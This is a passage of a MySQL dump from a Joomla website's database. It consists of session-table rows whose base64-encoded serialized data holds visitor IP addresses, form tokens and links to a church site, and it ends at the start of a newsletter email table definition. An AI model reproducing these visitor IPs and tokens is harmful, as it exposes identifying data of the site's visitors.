iO2k6MTU2OTM3ODUyMDt9fX19fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6566633363316366356437636537643962643330626432393339366165666237, 0, 1, 1569377880, 'joomla|s:1164:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3Nzg4MDtzOjQ6Imxhc3QiO2k6MTU2OTM3Nzg4MDtzOjM6Im5vdyI7aToxNTY5Mzc3ODgwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44My42MyI7fXM6NToidG9rZW4iO3M6MzI6IkNzYUFXaW9aclRTRG1hdWRWb0cwYnh4TWhxOFJYUkliIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6NjoibWFpbHRvIjtPOjg6InN0ZENsYXNzIjoxOntzOjY6Im1haWx0byI7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmb3JtIjtPOjg6InN0ZENsYXNzIjoxOntzOjQ6ImRhdGEiO2E6NTp7czo0OiJsaW5rIjtzOjQwOiIwYjQwNWI2NDMxNjBiMTUwZDFkZjEwNzRlMTEyMGJkNzAyYTNhNDQzIjtzOjY6InNlbmRlciI7czowOiIiO3M6Nzoic3ViamVjdCI7czowOiIiO3M6OToiZW1haWxmcm9tIjtzOjA6IiI7czo3OiJlbWFpbHRvIjtzOjA6IiI7fX19fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6631356665373232643265646463663333363737363936323435383530303835, 0, 1, 1569378632, 'joomla|s:1168:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3ODYzMTtzOjQ6Imxhc3QiO2k6MTU2OTM3ODYzMTtzOjM6Im5vdyI7aToxNTY5Mzc4NjMxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjE1Ny41NS4zOS44NCI7fXM6NToidG9rZW4iO3M6MzI6Ik1iOHJvV0trNjZMd2FsR3RDWnhmd1dKYXNCNkZWRFoyIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fXM6MTA6ImNvbV9tYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NToibGlua3MiO2E6MTp7czo0MDoiNWNjYTcyY2U3ZDUxOGRkYTg0ZjZhZmIzNWNiNGU4NDFmNTFmZjA2YiI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjg5OiJodHRwczovL3d3dy5saWZlb2FzaXNpbnRlcm5hdGlvbmFsY2h1cmNoLm9yZy9jb21wb25lbnQvazIvaXRlbS8xOC1mcm9tLW91ci1mYXRoZXItcy1oZWFydCI7czo2OiJleHBpcnkiO2k6MTU2OTM3ODYzMjt9fX19fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6632343961366666373765336465646333313439383737383036643866646535, 0, 1, 1569382244, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjI0NDtzOjQ6Imxhc3QiO2k6MTU2OTM4MjI0NDtzOjM6Im5vdyI7aToxNTY5MzgyMjQ0O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6633303463353336313464653232343064643135346361656131353436393730, 0, 1, 1569384150, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDE1MDtzOjQ6Imxhc3QiO2k6MTU2OTM4NDE1MDtzOjM6Im5vdyI7aToxNTY5Mzg0MTUwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS45My4yOCI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6633326231313436306162376334313834636161393135623739653361396632, 0, 1, 1569384731, 'joomla|s:736:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDczMDtzOjQ6Imxhc3QiO2k6MTU2OTM4NDczMDtzOjM6Im5vdyI7aToxNTY5Mzg0NzMwO31zOjU6InRva2VuIjtzOjMyOiJZWFhqZ2dTTmJkMHJlZlpaNWY1c3N0YkhiOGpEZlJwQyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6635666631393333326664333664363165666238663934623763646366326565, 0, 1, 1569382112, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjExMjtzOjQ6Imxhc3QiO2k6MTU2OTM4MjExMjtzOjM6Im5vdyI7aToxNTY5MzgyMTEyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO31zOjU6InRva2VuIjtzOjMyOiJaemNWajROZFRFOEh6b0k1QVJWQlNjUHA5Z3RMTWxvWiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6636393161616335353933356132613135653138363739396466613863336533, 0, 1, 1569382306, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjMwNjtzOjQ6Imxhc3QiO2k6MTU2OTM4MjMwNjtzOjM6Im5vdyI7aToxNTY5MzgyMzA2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6636666536326631306430613961626537393266653535356139313036333162, 0, 1, 1569382239, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjIzODtzOjQ6Imxhc3QiO2k6MTU2OTM4MjIzODtzOjM6Im5vdyI7aToxNTY5MzgyMjM4O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6637373966636433376439653530303733376466366631303364626434383135, 0, 1, 1569376604, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToyO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NjQ3ODtzOjQ6Imxhc3QiO2k6MTU2OTM3NjQ3ODtzOjM6Im5vdyI7aToxNTY5Mzc2NjA0O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjQxLjIwMy43OC4xNDkiO31zOjU6InRva2VuIjtzOjMyOiJCRDhQM1BITmJFU0hZUjJMNnA0VlFiNjgxWmxYQ3VRTCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6637393033326531643433373431666538616535383831613536623335396331, 0, 1, 1569382068, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjA2NztzOjQ6Imxhc3QiO2k6MTU2OTM4MjA2NztzOjM6Im5vdyI7aToxNTY5MzgyMDY3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6638346432666436643763386332366337346166393035613663303065313438, 0, 1, 1569377853, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aTo2O3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM2MDE1MjtzOjQ6Imxhc3QiO2k6MTU2OTM3NDMxMjtzOjM6Im5vdyI7aToxNTY5Mzc3ODUzO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjE1NC4xMTMuNjkuMzgiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6662616564353337366538623230653165323964323335386165303238613063, 0, 1, 1569381687, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MTY4NjtzOjQ6Imxhc3QiO2k6MTU2OTM4MTY4NjtzOjM6Im5vdyI7aToxNTY5MzgxNjg2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjQ1Ljc5LjE5OS43NiI7fXM6NToidG9rZW4iO3M6MzI6IlQ5VDFBbHN1dUFqODJrYmRqWjJkMjVUaVFuUTZ2MHJzIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6663336563396565663761343432386664313132666631663563653863663039, 0, 1, 1569380230, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MDIzMDtzOjQ6Imxhc3QiO2k6MTU2OTM4MDIzMDtzOjM6Im5vdyI7aToxNTY5MzgwMjMwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTE6IjQ1LjMzLjc2LjE3Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6663336566376431393738663365656462303463343139336631316238313635, 0, 1, 1569381688, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MTY4NztzOjQ6Imxhc3QiO2k6MTU2OTM4MTY4NztzOjM6Im5vdyI7aToxNTY5MzgxNjg3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjE5OC41OC45Ni4yMTIiO31zOjU6InRva2VuIjtzOjMyOiJmOTY3VEpRUURsZ1NWbHF4SkJZNzBIMVJWY2llZTVVUSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6664653134613231323832393635396638613337633333353664646332346561, 0, 1, 1569382794, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aTozNTtzOjU6InRpbWVyIjtPOjg6InN0ZENsYXNzIjozOntzOjU6InN0YXJ0IjtpOjE1NjkzNjE1MTU7czo0OiJsYXN0IjtpOjE1NjkzODI3ODY7czozOiJub3ciO2k6MTU2OTM4Mjc5NDt9czo2OiJjbGllbnQiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiZm9yd2FyZGVkIjtzOjE0OiI4NC4xNzIuMjQzLjE1OSI7fXM6NToidG9rZW4iO3M6MzI6Ijk5eWo0Q0FSMGxyNkJWMHdUNGFhWEpiNldtdjRyRWY5Ijt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6665303331323765316632346362663339656161366333623264653730616233, 0, 1, 1569385355, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTM1NTtzOjQ6Imxhc3QiO2k6MTU2OTM4NTM1NTtzOjM6Im5vdyI7aToxNTY5Mzg1MzU1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE5OC41OC4xMDYuMjQ0Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6666383737643663326538386365393064323534383638396462386638333365, 0, 1, 1569377532, 'joomla|s:1160:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NzUzMTtzOjQ6Imxhc3QiO2k6MTU2OTM3NzUzMTtzOjM6Im5vdyI7aToxNTY5Mzc3NTMxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjE1Ny41NS4zOS44NCI7fXM6NToidG9rZW4iO3M6MzI6IlViOUtBYjNUTUI1M1U3QUJkbVY4TUpiTjQ3OUlJdmRMIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fXM6MTA6ImNvbV9tYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NToibGlua3MiO2E6MTp7czo0MDoiMzAwYmM3MzAxNTFkN2MxNjU5NDNmOTNiMzEwYTNlODFlZjVjNDUxYyI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjg1OiJodHRwczovL3d3dy5saWZlb2FzaXNpbnRlcm5hdGlvbmFsY2h1cmNoLm9yZy9yZXNvdXJjZXMvYmxvZy9pdGVtLzI0LWNvcnJlY3QtY2hyaXN0aWFuIjtzOjY6ImV4cGlyeSI7aToxNTY5Mzc3NTMxO319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_sj_newsletter_email`
--

CREATE TABLE `y57u5_sj_newsletter_email` (
  `id` int(11) UNSIGNED NOT NULL,
  `email` varchar(255) NOT NULL,
  `checked_out` int(11) NOT NULL,
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
